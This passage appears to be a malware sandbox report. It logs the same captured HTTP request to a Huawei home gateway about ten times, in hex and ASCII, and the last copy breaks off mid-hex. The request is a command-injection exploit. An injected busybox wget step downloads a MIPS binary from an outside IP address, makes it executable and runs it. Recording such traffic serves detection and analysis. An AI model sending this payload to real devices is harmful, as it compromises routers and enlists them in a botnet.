              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 